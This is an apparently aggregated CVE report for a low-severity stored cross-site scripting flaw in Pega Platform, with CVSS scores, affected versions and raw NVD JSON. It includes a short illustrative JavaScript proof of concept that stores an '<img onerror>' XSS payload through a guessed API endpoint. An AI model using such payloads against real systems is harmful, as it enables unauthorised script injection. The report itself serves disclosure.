Security Vulnerability Report
CVE-2025-62184 CVSS 3.4 LOW

CVE-2025-62184

Published: 2026-03-31 18:16:44
Last Modified: 2026-04-03 12:49:16

Description

Pega Platform versions 8.1.0 through 25.1.0 are affected by a Stored Cross-site Scripting vulnerability in a user interface component. Exploitation requires an administrative user; given the extensive access rights such a user already holds, the impact to Confidentiality is low and the impact to Integrity is none.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N
Weakness
CWE-79 (Cross-site Scripting)

Note: the 3.4 LOW figure is the primary CVSS 3.1 rating. The record also carries a secondary CVSS 4.0 rating of 4.8 MEDIUM (CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N), so tooling that prefers CVSS 4.0 will rank this issue one severity band higher.

Configurations (Affected Products)

cpe:2.3:a:pega:pega_platform:*:*:*:*:*:*:*:* - VULNERABLE
Pega Platform 8.1.0 - 25.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Example Stored XSS payload for Pega Platform
// Target: vulnerable UI component in versions 8.1.0 to 25.1.0
// Requirements: administrator privileges (PR:H in the CVSS vector)
const maliciousPayload = '<img src=x onerror=alert(1)>';

// Simulated API call to update a vulnerable component.
// The endpoint below is illustrative only; in a real scenario it would be
// specific to the Pega instance configuration.
fetch('/prweb/api/v1/save_component', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <Admin_Token>'
  },
  body: JSON.stringify({
    "componentId": "vulnerable_ui_element",
    "content": maliciousPayload
  })
}).then(response => {
  if (response.ok) console.log('Payload stored successfully');
});

References

https://support.pega.com/support-doc/pega-security-advisory-o25-vulnerability-remediation-note (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-62184",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T18:16:44.423",
    "lastModified": "2026-04-03T12:49:16.167",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Pega Platform versions 8.1.0 through 25.1.0 are affected by a Stored Cross-site Scripting vulnerability in a user interface component. Requires an administrative user and given extensive access rights, impact to Confidentiality is low and Integrity is none."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "HIGH",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N",
            "baseScore": 3.4,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pega:pega_platform:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.1",
                "versionEndIncluding": "25.1.0",
                "matchCriteriaId": "C5AF856D-F80C-4AA3-A569-2DF0DA5E4192"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.pega.com/support-doc/pega-security-advisory-o25-vulnerability-remediation-note",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}